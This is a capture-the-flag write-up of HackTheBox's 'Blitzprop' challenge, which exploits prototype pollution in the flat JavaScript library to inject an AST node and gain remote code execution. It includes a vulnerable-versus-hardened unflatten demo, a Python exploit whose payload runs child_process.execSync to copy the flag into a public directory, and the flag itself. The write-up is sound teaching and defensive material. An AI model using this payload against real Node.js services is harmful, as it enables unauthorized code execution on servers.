
HackTheBox Cyber Apocalypse CTF 2021: Blitzprop

TL;DR

  • The backend uses the vulnerable flat JavaScript library.
  • User-controlled JSON keys allow prototype pollution via __proto__.
  • Polluting the object graph lets us inject arbitrary AST nodes.
  • A malicious AST node executes child_process.execSync.
  • The flag is copied into the public /static directory.
  • A second request retrieves the flag directly.

Video Walkthrough

HackTheBox Cyber Apocalypse CTF 2021 Blitzprop prototype pollution RCE video walkthrough

Challenge Description

To exploit this, you need to use a 'prototype pollution' vulnerability within the flat library in order to gain RCE against the target. This requires a request to the server to 'pollute' the JavaScript objects, then a second request to trigger the payload. Overall, it was a really interesting box!
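As an added example (not the challenge's code and not the flat library's own implementation), the block below is a constructed dotted-key unflatten that reproduces the pollution described above, beside a hardened variant that rejects __proto__, constructor and prototype segments and builds on null-prototype objects. The names unflattenVulnerable, unflattenHardened, SAMPLE_BODY and demo are assumptions.

```javascript
// Vulnerable: on a plain object node['__proto__'] is Object.prototype, so the
// key "__proto__.block" writes a shared "block" property onto every object.
function unflattenVulnerable(flat) {
  const out = {};
  for (const [path, value] of Object.entries(flat)) {
    const parts = path.split('.');
    let node = out;
    for (const p of parts.slice(0, -1)) {
      if (typeof node[p] !== 'object' || node[p] === null) node[p] = {};
      node = node[p];
    }
    node[parts[parts.length - 1]] = value;
  }
  return out;
}

// Hardened: reject prototype-reaching segments and build on null-prototype objects.
const BLOCKED = new Set(['__proto__', 'constructor', 'prototype']);
function unflattenHardened(flat) {
  const out = Object.create(null);
  for (const [path, value] of Object.entries(flat)) {
    const parts = path.split('.');
    if (parts.some((p) => BLOCKED.has(p))) throw new Error(`rejected key: ${path}`);
    let node = out;
    for (const p of parts.slice(0, -1)) {
      const own = Object.prototype.hasOwnProperty.call(node, p);
      if (!own || typeof node[p] !== 'object' || node[p] === null) node[p] = Object.create(null);
      node = node[p];
    }
    node[parts[parts.length - 1]] = value;
  }
  return out;
}

// Constructed sample with the same shape as the challenge's first request.
const SAMPLE_BODY = {
  'song.name': 'The Goose went wild',
  '__proto__.block': { type: 'Text', line: '/* attacker-controlled */' },
};

// Parse with both variants; report whether a fresh object inherited "block".
function demo() {
  unflattenVulnerable(SAMPLE_BODY);
  const vulnerablePolluted = ({}).block !== undefined; // true
  delete Object.prototype.block; // undo the pollution before the next check
  let hardenedRejected = false;
  try { unflattenHardened(SAMPLE_BODY); } catch (e) { hardenedRejected = true; }
  return { vulnerablePolluted, hardenedRejected, hardenedPolluted: ({}).block !== undefined };
}
```

The same check applies to any server-side code that turns user-controlled keys into nested objects: a key segment that names a prototype must never be walked into.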

Solution

from pwn import *   # only used for success() to print the flag
import requests

TARGET_URL = 'http://188.166.172.13:31177'

# Request 1: the backend unflattens the submitted JSON with the flat library,
# so the "__proto__.block" key is written onto Object.prototype. The polluted
# "block" is later treated as an AST node and its "line" is executed, copying
# the flag into the public /static directory.
# Technique reference: https://blog.p6.is/AST-Injection/
result = requests.post(TARGET_URL + '/api/submit', json={
    "song.name": "The Goose went wild",
    "__proto__.block": {
        "type": "Text",
        "line": "process.mainModule.require('child_process').execSync(`cp flagz8gWv static/flag`)"
    }
})

# Request 2: fetch the copied flag straight from the static directory.
flag = requests.get(TARGET_URL + '/static/flag').text
success(flag)

Flag: CHTB{p0llute_with_styl3}